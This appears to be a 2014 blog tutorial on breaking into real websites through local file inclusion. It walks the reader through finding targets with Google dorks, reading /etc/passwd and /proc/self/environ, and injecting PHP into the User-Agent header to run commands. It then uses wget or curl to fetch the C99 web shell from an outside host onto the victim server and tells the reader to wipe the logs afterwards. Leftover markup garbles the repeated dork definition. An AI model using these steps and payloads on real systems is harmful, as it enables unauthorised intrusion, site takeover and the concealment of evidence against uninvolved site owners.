Tuesday, 18 March 2014

How to hack a website with Local file inclusion or LFI


To find a vulnerable website, we will be using what is known as a Google 'dorks; simply Google search a specific string or term to yield the desired results. often considered hacking' class='bbc ipSeoAcronym'>dork'. All you have to do is paste the dorks; simply Google search a specific string or term to yield the desired results. often considered hacking' class='bbc ipSeoAcronym'>dork into Google search, and see what you find!
 

allinurl:index.php?page=


Essentially you can replace 'index' and 'page' with whatever words you want and then search for that.

For example, you can use:



allinurl:site.php?site=


Once you paste your dorks; simply Google search a specific string or term to yield the desired results. often considered hacking' class='bbc ipSeoAcronym'>dork into Google, you should come up with a list of website which contain that URL, simply go to one of these and then follow the steps below!

NOTE: Few sites are vulnerable to LFI, but they do exist! You just have to keep searching until you find one.

So, let's say that we find the following site using our dorks; simply Google search a specific string or term to yield the desired results. often considered hacking' class='bbc ipSeoAcronym'>dork:

http://www.site.com/index.php?page=contacts.php



What we're going to do is replace contacts.php with 'null', so that you get the following:

http://www.site.com/index.php?page=null



If you see a list of errors running down the page, or missing content (pictures, text etc.), then the site is vulnerable and we may continue, otherwise just move on to the next site.

Now, we're going to try and connect to a file which we know exists on Linux servers, /etc/passwd.

Since index.php has the rights to connect to a file like contacts.php, it's possible that the administrator has forgottten to restrict its access to other files, including the files containing sensitive data.

We're going to try to read the file "/etc/passwd" which contains data on root users, etc.

So, now change your URL to:

http://www.site.com/index.php?page=/etc/passwd



If you see a large list of data appear, then that's great, the site is completely vulnerable to LFI, and you've pretty much got this in the bag.

If you don't see this data, but get a 403 error or more errors, then move on to another site.

Now, change your URL again to:

http://www.site.com/index.php?page=/proc/self/environ



If you now see a new set of data, that's great.

If somewhere in the data the following is shown, then that's even better.




DOCUMENT_ROOT=((Random value here))


If not, unfortunately you'll have to move on, there are ways to circumvent this, but I'm keeping this tutorial as basic as I can.

Now, open up Tamper Data, and change your User Agent value to the following:




<?system('id');?>


This is a basic PHP code to check if we can execute code on our vulnerable machine.
The page should refresh, and your DOCUMENT_ROOT value should have changed, if it didn't, go for another website.
Now change your User Agent again, this time to




<?system('uname -a');?>


If your User Agent changes again, great.
Now we're going to upload a shell, which will grant us full control of the site, and the ability to deface / root / whatever the fuck you feel like doing.
Change your user agent to the following:




<?system('wget http://www.sh3ll.org/c99.txt -O secret.php');?>


What the above command does is saves a text form of a powerful PHP shell, 'C99' and then renames it to secret.php.
Note: If the above wget command does not work, you should try curling it instead:




<?system('curl -o shell.php http://www.sh3ll.org/c99.txt');?>


Now navigate to your shell, which should be at the following directory:

http://www.site.com/secret.php



NOTE: If your website's vulnerable page was something like

http://www.site.com/dir/dir/dir/index.php?page=contacts.php



Then your shell will be at the directory of the index.php, so for the above case, you will find it at:

http://www.site.com/dir/dir/dir/secret.php



Now that your shell is uploaded, go nuts!

Don't forget to wipe the logs before you leave -- IMPORTANT.

Good luck and have fun!

0 comments:

Post a Comment